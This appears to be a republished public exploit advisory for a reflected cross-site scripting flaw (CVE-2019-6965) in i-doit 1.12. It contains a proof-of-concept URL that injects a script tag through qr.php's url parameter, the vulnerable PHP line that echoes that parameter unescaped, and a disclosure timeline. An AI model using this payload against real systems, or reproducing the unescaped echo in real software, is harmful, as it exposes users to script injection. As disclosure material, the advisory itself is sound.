扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 |
# Exploit Title: i-doit 1.12 Cross Site Scripting on qr.php file # Date: 28-03-2019 # Software Link: https://www.i-doit.org/ # Version: 1.12 # Exploit Author: BlackFog Team # Contact: info@securelayer7.net # Website: https://securelayer7.net # Category: webapps # Tested on: Firefox in Kali Linux. # CVE: CVE-2019-6965 Vendor Description ================== i-doit offers you a professional IT-documentation solution based on ITIL guidelines. You can document IT systems and their changes, define emergency plans, display vital information and ensure a stable and efficient operation of IT networks. Attack Type ================== Reflected Cross Site Scripting on qr.php file in URL perameter reported By Touhid M.Shaikh(@touhidshaikh22). Proof of Concept ================== https://IP_ADDRESS/src/tools/php/qr/qr.php?url=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E Vulnerable Code. ================== ---------------------------------- qr.php Source Code ----------------------------- ..................................... SNIP ........................................ $l_url = @$_GET['url'];<--- Vulnerable Perameter ..................................... SNIP ........................................ <img id="code" src="https://www.exploit-db.com/exploits/46620/<?php echo $l_url; ?>images/ajax-loading.gif" alt="Error loading the QR Code" /> <--- DisplayHere without any validation. ------------------------------qr.php Source Code ends --------------------------- Fixed ====== Update to latest Timeline ======== 10 Jan, 2018 === Update to Customer 11 Jan, 2018 === Got Mail to Trigger the issue and we are able to repoduce the same. 15 Jan, 2018 === Provided Hotfix. 17 Jan, 2018 === Got Thanks for responsible disclosure and agree to publish on public. |
体验盒子
